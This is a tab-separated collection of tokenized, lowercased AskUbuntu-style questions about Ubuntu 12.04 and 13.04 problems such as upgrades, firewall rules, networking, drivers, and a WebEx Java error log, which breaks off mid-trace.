300980	upgrade manager can not find a server	my upgrade manager went zombie a long time ago . i finally decided to do something about it . it claims that i have an invalid internet connection when i tell him to find a best suitable server on the server list . when i choose the server by myself it simply does not find any updates . because of that i am stuck at the 12.04 version . my internet connection is definitely very fine , i tried at 4 different internet sources . so where 's the bug ? ps i have already tried doing this by the command line with sudo do release upgrade and all of that . the result is similar - no updates found . contents of etc/apt/sources /etc/apt/sources.list.d/ferramroberto-sopcast-oneiric.list /etc/apt/sources.list.d/ferramroberto-sopcast-oneiric.list.distupgrade /etc/apt/sources.list.d/ferramroberto-sopcast-oneiric.list.save /etc/apt/sources.list.d/google-talkplugin.list /etc/apt/sources.list.d/google-talkplugin.list.distupgrade /etc/apt/sources.list.d/google-talkplugin.list.save /etc/apt/sources.list.d/precise-partner.list /etc/apt/sources.list.d/precise-partner.list.distupgrade /etc/apt/sources.list.d/precise-partner.list.save /etc/apt/sources.list.d/ubuntu-wine-ppa-precise.list /etc/apt/sources.list.d/ubuntu-wine-ppa-precise.list.distupgrade /etc/apt/sources.list.d/ubuntu-wine-ppa-precise.list.save /etc/apt/sources.list.d/ubuntu-x-swat-x-updates-precise.list /etc/apt/sources.list.d/ubuntu-x-swat-x-updates-precise.list.distupgrade /etc/apt/sources.list.d/ubuntu-x-swat-x-updates-precise.list.save
300991	how do i activate ip tables or ufw with ease . also , use elevation to activate	how do i activate ip tables or ufw with ease . also , use elevation to activate . further once active how to i block all unsolicited incoming coneections and yet allow all outgoing connections
300992	how does wifi connection open before i login ?	when i 'm on the lightdm screen , i notice that my wpa wifi connection becomes available . this is cool , but somethings bothers me : how does it happen while i did not login yet , so i did not provide my password , so the gnome-keyring is locked and supposedly encrypted ? what is the trick ? is my keyring encrypted and safe ?
300993	neither empathy nor pidgin work	i tried pidgin on my ubuntu 12.04 and it showed a very buggy behaviour . it could never connect to gtalk and even crashed sometimes in the process . so i decided to switch to empathy . but it has its own problems . it connects to my gtalk and yahoo accounts , but there is another gtalk account which it ca n't connect to , and when i try to see what 's wrong by going to edit- > account , the edit account window shows for a second and then immediately disappears . i tried re-installing whole empathy package ( and reboot a few times in the process ) , but it did n't work . any idea what to do now ?
300997	ubuntu 12.04 and inspiron 6400	what driver do i need for ubuntu 12.4 to work with a dell inspiron 6400 ? i can not get the wireless connection to work . then how do i install it ? i ca n't get the wireless connection to work . i just started using ubuntu tonight and ca n't find instructions i can understand for accomplishing this task .
300998	create alias with paramater in the middle	i want to create an alias for grep like this : grep argx ~/myfile where argx is a parameter and myfile is always the same . how can i do this ?
301002	a filesystem not visible	i installed ubuntu parallel to windows xp from the wubi windows installer . there are 3 partitions on my storage : c , d and e with windows installed on c , and ubuntu installed on e when i go to the file explorer i find 16 gb filesystem ( c ) and 52 gb filesystem ( d ) , but i ca n't find the e at all . i am totally new to this and a complete noob any help is appreciated : d thank you in advance
301004	external screen detected but not working on displayport connection	i 'm running up to date raring on my thinkpad x220 and stumbled upon weird problem . i can connect to an external 24 inch dell u2312hm external screen using displayport cable . i tried the same connection at work , with similar , but larger screen - 27 inch dell u2713hm using the same cable . when i check > > settings > > displays the display is detected . however i 'm looking at dark screen.. bizarrely - when i hit the prtscr - i can also see it correctly with ubuntu walpaper o_o the monitor is detected and works correctly when using displayport to dvi-d adapter cable ( single link ) however the resolution on this setup is limited to 1920 x 1200 so i 'd really like to take advantage of dvi since the laptop should support it . how could i fix this issue ?
301008	kate creates an extra file for every file it edits , why ?	i 've just started using kubuntu and my question might seem dull but kate is really annoying . it creates a file for each file i try to edit , like filename~ . i know that it might be a backup or something , but is there a way to prevent that ?
301015	how to bring up wifi direct stack on ubuntu	i am working on a project where i have to connect a linux laptop with an android tablet using wifi direct.the tablet already has the wifi direct option but the laptop doesnt . can someone please tell what is the procedure i need to follow to get wifi direct working on my laptop . i am using samsung np-r528 laptop with ubuntu 12.04 . edit : i have figured out that i have to install wpa_supplicant and wpa_cli to use p2p commands http : //thangamaniarun.wordpress.com/2013/03/03/how-to-use-wi-fi-direct-on-androidubuntu-part1/ i followed the process given in the following link http : //processors.wiki.ti.com/index.php/omap_wireless_connectivity_nlcp_wifi_direct_configuration_scripts but when i try to connect ( using p2p_connect pin keypad ) it to my andorid tablet the followin happens on linux machine it shows go_neg_success , p2p-group-formation-success , p2p-group-started , wps-success and then immediately ctrl-event-eap-failure # android 's mac # , ap-sta-connected # android 's mac # , ap-sta-disconnected # android 's mac # when i use adb to see log cat it also shows the same thing that group is formed and then immediately p2p-group-removed . same thing happened when i tried the other way round ( i.e . form android to ubuntu )
301018	how to install ubuntu builder on ubuntu 12.10	i 've seen several videos on youtube that after downloading ubuntu builder it dos n't starts . please someone tell me how to install it ...
301027	lexmark e230 ca n't print on 12.04 and later	the printer will print a test page and then , anything i give it results in garbage spitting out . every page gets a bit of it on the top . `` pjl enter language = pclxl ) hp-pcl xl ; 1 ; 1 ; comment copyright artifex software '' this is what will come out on the first page of many . the rest just get a bit random gibberish on the top . here is a listing of the debugging log in pastebin http : //pastebin.com/clrrpmej i have also tried replacing pxlmono and choosing other drivers like ljet4 . it gave a tad better results but the resulting pages still have some garbage on them . adding a pastebin listing of the cupsd.conf file : http : //pastebin.com/qunuukka
301028	how to use specific ip with vsftpd ?	here is the scenario : we have one aws ubuntu server server this server is working as ftp client now when we try to connect to xyz companies ftp server using this aws server as client , it is sending it 's local lan ip while connecting to the ftp server , because of which listing of directories does not work . log shows that we are connected to the ftp server + we are authenticated correctly ... port listing goes successful + only directory listing fails . we can provide specific ip in ftp using filezilla which it will use while going out of the gateway . here we ca n't use that because it does not have gui & it is going to be used by a php script . this problem was also there in windows at that time we solved it by giving a elastic ip to filezilla . before the solution we used to receive the error & log showed like this . this point is added just to give you more details . & it 's the same issue with ubuntu & we want to give a elastic ip somewhere in ftp so that it will start working ... we hope so at least . ; ) recent updates please click here for vsftpd.conf file . little more clarification : in this case machine `` a '' is our ftp server ( which is aws ubuntu server ) for internal usage , because of the lot of other process and data which is regularly uploaded on this ftp server ( machine `` a '' ) & machine `` b '' is our client 's ftp server which they use for their internal purposes . now we need to pull some data from our clients ftp server ( i.e . machine `` b '' ) to our server ( i.e . machine `` a '' ) and then process it . after that we need to put the processed data back on to the client 's ftp server ( i.e . machine `` b '' ) . that 's what is not working logs of clients firewall when we tried to connect with machine `` b '' as shown in below image .
301032	direct install of ubuntu into new hdd	ok , so i have search most of the questions/answers related to this , but i could not find any `` suitable '' to my situation . i have a laptop currently running win xp . i also have a brand new and empty ssd . the question is : how can i install ubuntu in to the new ssd ? i have a cable that can connect the ssd to the usb port . can the ssd serve as the usb drive and i should just follow the instructions to install from usb drive ? since i want to replace the existing hdd with the ssd , if i follow the usb drive instalation ( using the ssd ) , can i then just remove the hdd and replace with the ssd now , hopefully , running ubuntu ?
301033	ca n't boot after installing ubuntu into separate partition	when i try to boot my computer , i just get a command prompt : '' no such partition grub > _ '' i partitioned my computer hard disk into two partitions : -- first partition ( c : ) has the already installed windows xp ( marked as primary partition ) -- second partition ( k : ) : i installed ubuntu 11.10 into this one ( marked as logical partition , with the name `` sd5 or something like that ) . after installing ubuntu , i could boot only windows . did a google search to see what to do . based on that : an os to boot , it has to be in a primary partition , and that logical partition can be changed into a primary partition . used `` minitool partitioning home edition 7.8 : -- changed second partition with ubuntu into primary partition -- but , did not change the first already primary into logical partition . so now , i had two primary partitions . now , neither os boots . only get the command prompt i noted at the beginning of this post right now , i can boot only from a usb-bootable ubuntu.. please help ! . thanks for all help .
301034	can not open port	i 've been struggling to open the port 5432 for remote postgresql access . which i installed on a ubuntu 10.04 desktop machine . here is the shell log : xybrek @ ubuntu : ~ $ sudo ufw allow 5432 [ sudo ] password for xybrek : skipping adding existing rule xybrek @ ubuntu : ~ $ sudo ufw allow 5432/tcp skipping adding existing rule xybrek @ ubuntu : ~ $ sudo ufw status status : active to action from -- -- -- -- -- -- 5432/tcp allow anywhere 5433/tcp allow anywhere 5432 allow anywhere 5432/tcp allow out anywhere xybrek @ ubuntu : ~ $ sudo nmap localhost -p5432 starting nmap 5.00 ( http : //nmap.org ) at 2013-05-28 17:57 pht warning : hostname localhost resolves to 2 ips . using 127.0.0.1 . interesting ports on localhost ( 127.0.0.1 ) : port state service 5432/tcp closed postgresql nmap done : 1 ip address ( 1 host up ) scanned in 0.12 seconds when i try to connect to the port from another machine its just connection timeout , whereas when i try to connect to other port like 80 , 8080 it works . what am i missing ? edit : status : active to action from -- -- -- -- -- -- [ 1 ] 5432 allow in anywhere
301036	downloading dropbox from terminal with wget makes command crash.-ubuntu server 12.04	i have downloaded dropbox manually on many instances on ubuntu systems.today i tried to use it on an ubuntu 12.04 server edition , so i used the command wget -o - `` https : //www.dropbox.com/download ? plat=lnx.x86_64 '' in my home directory.the problem is , the command crashes , at the moment the message `` http request sent , awaiting response '' is last shown , and starts throwing random characters on screen , until i force it to stop . any suggestions ? thank you in advance . note : i 'm executing this through putty from a windows os .
301042	improving steam performance on ubuntu 13.04 with nvidia	hello i have a question regarding tweaking unity performance so that you can actually game using steam with smooth frame rates . i have a dell precision m6300 mobile workstation with a quadro fx1600m 256mb graphics card,8gb of ram , an ssd , core 2 duo 2.5ghz and use the 313 drivers shipped with ubuntu . now - when i run windows 7 on the laptop with aero or standard desktop effects i can play half life 2 on 1920x1200 with highest details and get 35fps ( 1680x1050 that goes up to 55fps ) . now on ubuntu i have ensured that undirect full screen windows is ticked in ccsm , disabled vsync and switched that off in the nvidia x server settings programs . when i run steam under unity and launch hl2 , the game loads fine but the splash screen is choppy and the new game screen the graphics are slow and jerky . when looking at the card proprieties in nvidia x server settings - unity at idle is consuming 238mb of graphics memory to run the desktop , this doesn '' t seem to be available for the game . the reason i have come to this conclusion is that if i install gnome session and use the fail back session the amount of video ram used to run the desktop is 50 mb - hl2 is as smooth as butter when launched through this . also tried kde and its also smooth , and mate desktop and lxde and xfce and even default gnome 3 session i can play hl2 fine . does anyone know how i can tweak ccsm or unity to ensure that when i play full screen games it releases the hold of the vram so i can game without switching des ? i like unity and this laptop is still powerful enough to game on and get work done ( it was over 2k a few years ago ) - i dont have any of these issues on my desktop workstation but that has a 2gb 660ti card so the memory overhead of unity is not an issue . can anyone help with this ? i want to be able to take my laptop away and game if i need to chill out and really want to do it in ubuntu to support steam .
301043	how to show images in normal size by default with image viewer	by default when i open an image it fits to the window size ( scale it down ) . i have to hit the button `` show the image at its normal size '' every time when i go to the next/previous image or open a new image . i tried this , but it does n't work .
301051	is going 64-bit ubuntu is good ?	is it all right to upgrade to 64 bit 13.04 ubuntu with this specs ? my specs : processor : intel p6200 gpu : intel hd graphics ram : 2gb by the way i have read this : https : //sites.google.com/site/easylinuxtipsproject/version # toc-32-bit-or-64-bit-
301054	downloading ubuntu 12.04 lts on macbook pro osx	i am trying to download ubuntu on my computer , but whenever i operate the ubuntu it says the following disk images could n't be opened . my question is do i need some kind of application to operate ubuntu ? please help me to download ubuntu on my computer .
301057	testing my system , i need a script that will use as much ram and swap as possible	i 'm testing my system with zram , i need a script that will use as much ram as possible . this script should fill up my ram with random stuff not just zeros .
301069	my screen turns off when i watch movies on youtube	when i use vlc or other media player , i can watch the movie until the end without touching the pc . if i watch a movie on youtube using chromium or firefox my screen will turn off as is set in system settings > brightness and lock . how to prevent this without to change the settings in brightness and lock . edit : my ubuntu 13.04 with gnome 3.6.3.1 uses gnome-screensaver ( i did n't installed any other screensaver ) . any of the answers from this question did n't worked for me in 13.04 : how to prevent my screen from dimming when watching youtube ? - this question is related in 12.04 .
301070	igoogle replacement in ubuntu	i have been using igoogle for a long time , but it closes in november . there are ubuntu replacements for the various functions i use in igoogle : gmail , weather , translate , calendar , gdocs , google search , etc in the form of web applications . the question is : does ubuntu provide any way i can assemble these functions into a single display as happens in igoogle ? or with ubuntu do i even need to ? is there a different way ubuntu allows me to be aware of the information that these services offer through igoogle . does , or could , ubuntu allow me to control the layout of these webapps so i can get a quick overview and quickly select the applications i am interested in ?
301073	how to stream video from ipad to ubuntu 13.04	could you advise how to stream video from ipad to ubuntu 13.04 ? i 've tried the teamviewer , but it does n't support from ipad - > ubuntu . appreciate any ideas , vladimir zateychuk skype : vzateychuk
301076	wmctrl on ubuntu touch	i want to control windows via window manager controls ( wmctrl ) . i am able to successfully switch between qml application windows using wmctrl commands on the ubuntu desktop . but i am running same applications on ubuntu touch nexus tablet . it results in an error as shown '' can not open display '' . does ubuntu touch supports the window management ? how to achieve this ?
301080	what is the method to manage network interfaces in ubuntu 12.04 ?	after upgrading two instances of an older ubuntu ( 10.10 and 11.04 ) to 12.04 , i notice an apparent conflict between the way my network interfaces were previously managed and the new methodology , which apprently is extremely `` network-manager-centric . '' it seems that my previous configurations , stored in /etc/network/interfaces , continue to work , but tools like 'dhclient ' not longer function as expected . now , in order to re-configure the interface between a static ip and a dhcp ip , i 've discovered the best solution is to comment out all but the 'lo ' adapter in the /etc/network/interfaces file , and just perform all my configuraion changes with network manager . my question is 2-fold : is this expected behavior , as part of some kind of long-term plan to exclusively use network manager ? is there documentation which describes the current state of network interface management in ubuntu ?
301083	you need a passphrase to unlock the secret key for user	from launchpad i have an email containing openpgp encrypted key . i received that email in gmail . but gmail wont decrypt it . then i setup thunderbird for gmail account and installed enigmail for decrypting pgp key . all works fine , but when trying to open that specific message it pops up with a message you need a passphrase to unlock the secret key for user and give a password field to enter . but my root password or mail password anything wo n't work there and i am not clear about this passphrase . however , what can i do now ?
301089	no desktop icons after uninstalling nemo	i tested nemo on ubuntu 12.04 . i made it the default file manager . when i uninstalled it , desktop icons disappeared and i ca n't do a right click on desktop to open menu . how can i make nautilus the default file manager , may this solve the problem ?
301092	font size for some greek extended characters in true type fonts are 2 sizes bigger	i am a ancient history student and , logically , i need to type in ancient greek , but some greek characters for greek extended in true type fonts are 2 sizes bigger . for example , if i type `` μοῖρα '' in size 12 , the character `` ῖ '' appears in size 14 , though formally it says 12 . if it is typed in 14 , it will appear in 16 , 18 in 20 , and so on ... this does not happen with ubuntu fonts . i 've already reinstalled the fonts but the problem continues . edit : i am using times new roman
301095	convert bootable usb stick to iso file	i am trying to get an iso file from a bootable usb memory stick . the device name for the stick is dev/sdf1 . in this answer : convert bootable usb to iso file , dd was suggested for copying . so i did : sudo dd if=/dev/sdf1 of=win7.iso however , the stick has a size of 30g , but only 12g are used . running the command above , it creates an iso image larger than 12g , i stopped dd when the file was > 20g , since i ran out of disk space . is it normal that the iso file gets so big or is there another way to achieve my goal ?
301096	installing software center ubuntu	okay so i recently had some problems with ubuntu software centre where if i opened it from the dashboard it would open up , but only display a white screen . nothing happened , so if i then clicked the 'x ' , it would ask me if i would like to force close the non responding software centre . to get round this i 've been opening the software centre via terminal which seems to let it work fine . but i needed it working normally and after lots of attempts i could n't figure it out so decided to just un-install and reinstall it . un-install worked fine , but now for the reinstall . when i type into terminal sudo apt-get install software-center i get this back ; reading package lists ... done building dependency tree reading state information ... done package software-center is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'software-center ' has no installation candidate any ideas ? thanks : ) ubuntu 12.04
301099	running ubuntu from external hdd . boots very slowly	i 've installed ubuntu 13.04 on an external hard drive ( usb2 ) and when i boot , it takes ages to get past the purple screen . otherwise , the performance is perfectly fine . is this just a symptom of slow r/w speeds or is there something i can do to fix it ?
301101	diet ubuntu for 12.04 ?	the diet ubuntu article on ubuntu wiki lists package names that are useful potential candidates for `` bloatware '' for some users that want remove some packages . but this article was written in 2008 and last updated in 2011 . is there a more recent list of this kind for ubuntu 12.04 ? edit it would be good if one could keep his running system . installing a new one is not what i seek for , at least . : )
301102	how to update my ubuntu software center app	ok so i programmed an app ( gibbereng ) and submitted it to the app store and it got published and all that . how do i make an update to that app . so that all the 80 people who have downloaded it receive the update ?
301104	how would people give me a gift from the ubuntu one music store ?	i want to stop getting new music on cds , and transition to a 'downloads only ' regime . i am considering signing up to an ubuntu one music streaming subscription , but i am aware that a lot of the cds i have obtained in the past were gifts from my family . how would my family & others give me a music album from the ubuntu one music store as a gift ? do they need to have an ubuntu one account themselves ? or , if it is not possible to give a specific music album , can they give some kind of credit / voucher / gift certificate ? n.b . this is different from the question of how to give the ubuntu one music streaming subscription itself as a gift .
301106	how to install windows xp from the second hard drive on ubuntu 13.04	i have ubuntu 13.04 on the first hdd but can not recognize the second hdd with windows xp after reboot of pc in order to nest os es together , what should i do further ?
301107	how do i build juju-core from source ?	i 'm interested in compiling and running juju-core from source . how can i do this ? what are the risks involved ?
301109	is there a log of package management activity like recent removals ?	is there a log that shows recent activity done by the package management , like apt-get , dpkg , synaptics ? for example , you removed a bunch of packages but realized that a not-tracked application ( for example under development ) was actually dependent on some of them . so you would like to view the log of the removals in synaptic or other interface . : )
301116	no bluetooth applet visible in ubuntu 12.10 with mate desktopk environment ! ! !	i have installed ubuntu 12.10 recently and also installed mate desktop 1.6 ... ..my problem is when i plug-in my usb bluetooth device ..no bt manager or applet appears on my mate panels ( my bt device is working in unity environment ) ... may be mate bluetooth manager is not installed or activated ... please help me solve this as i love the mate desktop because of my background as a windows user . thanks
301117	how to add password encryption	i have an encryption app that just encrypts a string and then can decrypt also.. but how can i make it so the user sets a password and the other person has to put in that password to decrypt the message .
301118	replace or remove evince	i want to use my own document viewer ( okular ) and never want to see evince again . in ubuntu 13.04 when i try 'dpkg -p evince ' it says that ubuntu-desktop depends on it .
301122	prevent a specific usb device from auto-mounting	i want to stop a usb device from automounting in ubuntu 13.04 . for example , when i connect my iphone 5 to my desktop i am consistently prompted for what i want to do ( whether or not i want to erase the `` ipod '' connected to my machine , etc ) . since i do n't use the computer as anything more than a way to charge the device , is there a way to prevent the device from mounting and still allow the device to draw current from the machine ?
301129	enable navigation buttons and address area in xfce	i just installed the xfce desktop environment and i ca n't find the navigation buttons and the address area in the file manager . in other desktop environment i can find this feature : how can i enable this feature .
301130	why is find running here ?	i noticed very high iowait , even copying/pasting from netbeans to firefox was taking several minutes and hanging for a long while . in powertop , i noticed : usage events/s category description 0.0 pkts/s device network interface : eth1 ( wl ) 100.0 % device audio codec hwc0d0 : realtek 75.7 % device display backlight 100.0 % device usb device : usb-device-05ac-8205 308.1 µs/s 16.9 process [ rcu_sched ] 317.3 µs/s 1.7 process [ ksoftirqd/0 ] 2.6 ms/s 4.6 process compiz 1.8 ms/s 15.0 process gnome-terminal 8.0 ms/s 0.00 kwork acpi_os_execute_deferred 7.3 ms/s 0.00 timer wl_timer 6.3 ms/s 34.6 process /usr/bin/find / -ignore_readdir_race ( -fstype nfs -o -fstype nfs -o -fstype nfs4 -o -fstype afs -o -fstype binfmt_misc -o -fst 2.8 ms/s 16.1 process /usr/bin/x :0 -core -auth /var/run/lightdm/root/:0 -nolisten tcp vt7 -novtswitch -background none 2.4 ms/s 0.15 process [ kswapd0 ] 1.3 ms/s 0.00 process /usr/sbin/preload -s /var/lib/preload/preload.state 1.1 ms/s 0.00 process /usr/sbin/macfanctld 1.0 ms/s 14.3 interrupt [ 45 ] i915 0.9 ms/s 7.0 timer tick_sched_timer 0.7 ms/s 0.00 interrupt [ 21 ] uhci_hcd : usb7 0.7 ms/s 10.2 kwork od_dbs_timer 659.0 µs/s 0.05 process indicator-multiload 649.5 µs/s 0.4 interrupt [ 9 ] rcu ( softirq ) 643.8 µs/s 0.00 process /usr/lib/x86_64-linux-gnu/hud/hud-service 641.7 µs/s 33.5 interrupt [ 4 ] block ( softirq ) 629.7 µs/s 0.7 process /usr/lib/unity/unity-panel-service 585.4 µs/s 0.05 process powertop 498.7 µs/s 0.00 interrupt [ 43 ] sata controller 371.8 µs/s 0.00 timer delayed_work_timer_fn 301.4 µs/s 0.15 kwork atp_reinit 299.4 µs/s 0.05 kwork disk_events_workfn 185.3 µs/s 13.5 interrupt [ 21 ] ata_piix 171.3 µs/s 2.6 timer hrtimer_wakeup 162.5 µs/s 0.05 process [ ksoftirqd/1 ] 152.6 µs/s 0.10 process /usr/bin/python3 /usr/bin/indicator-cpufreq 148.5 µs/s 0.00 interrupt [ 0 ] timer/0 146.2 µs/s 2.4 process /usr/sbin/mysqld 134.8 µs/s 0.10 process /usr/lib/x86_64-linux-gnu/indicator-application-service 121.7 µs/s 0.00 interrupt [ 1 ] timer ( softirq ) 115.9 µs/s 0.00 timer timeout_func 109.8 µs/s 0.00 timer rh_timer_func 109.7 µs/s 0.00 process /usr/bin/sort -z -f 109.3 µs/s 0.7 interrupt [ 6 ] tasklet ( softirq ) 102.3 µs/s 0.00 process //bin/dbus-daemon -- fork -- print-pid 5 -- print-address 7 -- session 101.1 µs/s 0.00 interrupt [ 21 ] ehci_hcd : usb1 78.5 µs/s 0.15 interrupt [ 7 ] sched ( softirq ) what is this find running , 34.6 events/second , is this what is making everything slow ?
301132	desktop iso amd64	i have an intel chip which is running vista x86 but capable of x64 can i use this with an intel chip ? does it matter if i 'm running both a 32bit and and a 64bit os on the same box ?
301134	how to set password for hdd partition mounting	i am using ubuntu 13.04 x86_64 . i have one extra ext4 partition of 90 gb beside my / partition . i want to ask the user to enter a password whenever he/she tries to mount that extra partition by say 1 ) clicking on it in nautilus left hand column or 2 ) using command-line .
301136	smart monitoring of landscape machines	i 'm using canonical landscape , and i wondered if there is a way to be automatically notified if the smart status of a disk deteriorates . i just noticed by chance that the disks started failing in one of my boxes , and i somehow expected landscape to alert me to this condition . do i need to just enable that somewhere , or is there a way to add a custom sensor ? if so , how to make sure i will get alerted in time ?
301140	dhcp working but clients do n't have internet	just as the title says . my dhcp assigns ip addresse and all that stuff to clients ; however clients do n't have access to the internet . here 's my dhcp configuration : ddns-update-style none ; option domain-name `` home.lan '' ; option domain-name-servers 8.8.8.8 , 8.8.4.4 ; default-lease-time 600 ; max-lease-time 7200 ; option broadcast-address 10.8.8.255 ; subnet 10.8.8.0 netmask 255.255.255.0 { range 10.8.8.5 10.8.8.9 ; option routers 10.8.8.1 ; } broadcast-address 10.8.8.255 i have of course added interfaces= '' eth0 '' in /etc/default/isc-dhcp-server and added eth0 interface definition to /etc/network/interfaces auto eth0 iface eth0 inet static address 10.8.8.1 netmask 255.255.255.0 gateway 10.8.8.1 broadcast 10.8.8.255 i 've added net.ipv4.ip_forward=1 in /etc/sysctl.conf on the net , i 've read that it is possible to simply share the net using linux gui . ( here 's easy guide with screenshots on how to share the connection ) but it does n't work in my case . if i change on my wlan0 ( auto dhcp ) to ( share to other computers ) i do n't have internet access after rebooting because wlan0 do not automatically get connection info . clients receive ip , default gateway , dns'es , netmask and so . mind any of u helping me with finding out , why it is not working ? im using ubuntu 12.04 . thanks .
301143	is there easy and safe way to resize /boot	my /boot is full . is there an easy and safe way to resize it ? i saw a discussion which said that /boot partition is not required . a /boot directory will be fine . however , i do n't think i can have /boot folder while /boot is mounted . similarly , i can resize /boot because i ca n't unmount it . i plan to 1. create a new logical volume , 2. mount it and copy all files from /boot to this new volume , and 3. change mount table to mount new logical volume under /boot . since it 's /boot , i wo n't be able to boot if i make mistakes . could anyone give me instructions ? steve
301145	how to emit ondropped in qml drag n drop example ?	in the qml documentation there is a drag'n'drop example : import qtquick 2.0 item { width : 200 ; height : 200 droparea { x : 75 ; y : 75 width : 50 ; height : 50 ondropped : console.log ( `` dropped '' ) onentered : console.log ( `` entered '' ) rectangle { anchors.fill : parent color : `` green '' visible : parent.containsdrag } } rectangle { x : 10 ; y : 10 width : 20 ; height : 20 color : `` red '' drag.active : dragarea.drag.active drag.hotspot.x : 10 drag.hotspot.y : 10 mousearea { id : dragarea anchors.fill : parent drag.target : parent } } } i have added the two lines with `` ondropped '' and `` onentered '' . while `` onentered '' is triggered by dragging the small rectangle , i can not make the `` ondropped '' to trigger . what do i have to do to make it trigger ?
301146	how do i get webex fully working with ubuntu 12.04 ?	i am trying to join a webex meeting from ubuntu 12.04 . i can join but i do not see the live chat messages , i hear no sound , and i can not see the presentation . i have tried using ubuntu 12.04 64-bit and 32-bit . the one time i was able to get it working , it was on 32-bit and the sound worked for a few minutes , but then stopped ; i could see the presentation , but i could not see the chat messages . i have installed oracle java 7 from the webupd8 ppa and downloaded all ubuntu updates as of today may 28th , 2013 . the webex system requirements page says they require ubuntu 10.x or 11.x 32-bit . does this mean in may of 2013 they do not support ubuntu 12.04 ? ! ? update may 29th : it seems i was looking at the old system requirements . it looks like these are the current webex system requirements . so , it says : `` webex will support any linux distribution as long as it meets the following minimum requirements : kernel : 2.6 or later x lib : x11r6 or later compatible c++ lib : libstdc++ 6 desktop environment , xfce 4.0 or later , kde , ximian , gnome gdk/gtk . version : 2.0 or later glib : 2.0 or later sun java 1.5 or later '' i am stilling learning about ubuntu and linux , but i know that ubuntu 12.04 comes with a newer kernel ( 3.2 ) , uses the x11 window manager , unity is based on gnome , and i installed oracle java 7 . when i search the software center for these other packages i am a bit confused since there are so many options . i am guessing that my problem is not having one or more of these packages and/or incompatible versions . does anyone have any insight on this ? update may 30th 10am est . i tried installing ia32-libs as recommended here ; same problem . i enabled the java console ; here is the output : java plug-in 10.21.2.11 using jre version 1.7.0_21-b11 java hotspot ( tm ) 64-bit server vm user home directory = /home/mrmccormack -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- c : clear console window f : finalize objects on finalization queue g : garbage collect h : display this help message l : dump classloader list m : print memory usage o : trigger logging q : hide console r : reload policy configuration s : dump system and deployment properties t : dump thread list v : dump thread stack x : clear classloader cache 0-5 : set trace level to -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- jdownload version 2009.03.03 java version : 1.7.0_21 java home : /usr/lib/jvm/java-7-oracle/jre os name : linux os arch : amd64 os version : 3.2.0-44-generic [ jdownload ] java client service home : https : //join-test.webex.com/client/t27l10nsp25ep3/javaclient/webex/ [ jdownload ] production home : /home/mrmccormack/.webex/1124 [ mysystem version 2009.02.05.01 ] initsystem ... # # # 1 runtime total memory : 78249984 , free memory : 54440552 # # # 2 runtime total memory : 78249984 , free memory : 68586336 # # # # # # try to load class dbr in mycloassloader2 ... loading native dbr ... java.lang.unsatisfiedlinkerror : /home/mrmccormack/.webex/1124/libdbr.so : /home/mrmccormack/.webex/1124/libdbr.so : wrong elf class : elfclass32 ( possible cause : architecture word width mismatch ) at java.lang.classloader $ nativelibrary.load ( native method ) at java.lang.classloader.loadlibrary1 ( classloader.java:1939 ) at java.lang.classloader.loadlibrary0 ( classloader.java:1864 ) at java.lang.classloader.loadlibrary ( classloader.java:1838 ) at java.lang.runtime.loadlibrary0 ( runtime.java:845 ) at java.lang.system.loadlibrary ( system.java:1084 ) at dbr.loadnativedbr ( dbr.java:22 ) at dbr . ( dbr.java:93 ) at sun.reflect.nativeconstructoraccessorimpl.newinstance0 ( native method ) at sun.reflect.nativeconstructoraccessorimpl.newinstance ( nativeconstructoraccessorimpl.java:57 ) at sun.reflect.delegatingconstructoraccessorimpl.newinstance ( delegatingconstructoraccessorimpl.java:45 ) at java.lang.reflect.constructor.newinstance ( constructor.java:525 ) at java.lang.class.newinstance0 ( class.java:374 ) at java.lang.class.newinstance ( class.java:327 ) at db.reset ( db.java:192 ) at mysystem.initsystem ( mysystem.java:132 ) at jdownload.run ( jdownload.java:253 ) at java.lang.thread.run ( thread.java:722 ) xxx [ dbr ] load native library failed # # # 1 runtime total memory : 78249984 , free memory : 67003992 # # # 2 runtime total memory : 78249984 , free memory : 68922760 # # # # # # try to load class dbr in mycloassloader2 ... loading native dbr ... java.lang.unsatisfiedlinkerror : /home/mrmccormack/.webex/1124/libdbr.so : /home/mrmccormack/.webex/1124/libdbr.so : wrong elf class : elfclass32 ( possible cause : architecture word width mismatch ) at java.lang.classloader $ nativelibrary.load ( native method ) at java.lang.classloader.loadlibrary1 ( classloader.java:1939 ) at java.lang.classloader.loadlibrary0 ( classloader.java:1864 ) at java.lang.classloader.loadlibrary ( classloader.java:1838 ) at java.lang.runtime.loadlibrary0 ( runtime.java:845 ) at java.lang.system.loadlibrary ( system.java:1084 ) at dbr.loadnativedbr ( dbr.java:22 ) at dbr . ( dbr.java:93 ) at sun.reflect.nativeconstructoraccessorimpl.newinstance0 ( native method ) at sun.reflect.nativeconstructoraccessorimpl.newinstance ( nativeconstructoraccessorimpl.java:57 ) at sun.reflect.delegatingconstructoraccessorimpl.newinstance ( delegatingconstructoraccessorimpl.java:45 ) at java.lang.reflect.constructor.newinstance ( constructor.java:525 ) at java.lang.class.newinstance0 ( class.java:374 ) at java.lang.class.newinstance ( class.java:327 ) at db.reset ( db.java:192 ) at mysystem.initsystem ( mysystem.java:132 ) at jdownload.run ( jdownload.java:253 ) at java.lang.thread.run ( thread.java:722 ) xxx [ dbr ] load native library failed # # # 1 runtime total memory : 78249984 , free memory : 66904832 # # # 2 runtime total memory : 78249984 , free memory : 68924592 # # # # # # try to load class dbr in mycloassloader2 ... loading native dbr ... java.lang.unsatisfiedlinkerror : /home/mrmccormack/.webex/1124/libdbr.so : /home/mrmccormack/.webex/1124/libdbr.so : wrong elf class : elfclass32 ( possible cause : architecture word width mismatch ) at java.lang.classloader $ nativelibrary.load ( native method ) at java.lang.classloader.loadlibrary1 ( classloader.java:1939 ) at java.lang.classloader.loadlibrary0 ( classloader.java:1864 ) at java.lang.classloader.loadlibrary ( classloader.java:1838 ) at java.lang.runtime.loadlibrary0 ( runtime.java:845 ) at java.lang.system.loadlibrary ( system.java:1084 ) at dbr.loadnativedbr ( dbr.java:22 ) at dbr . ( dbr.java:93 ) at sun.reflect.nativeconstructoraccessorimpl.newinstance0 ( native method ) at sun.reflect.nativeconstructoraccessorimpl.newinstance ( nativeconstructoraccessorimpl.java:57 ) at sun.reflect.delegatingconstructoraccessorimpl.newinstance ( delegatingconstructoraccessorimpl.java:45 ) at java.lang.reflect.constructor.newinstance ( constructor.java:525 ) at 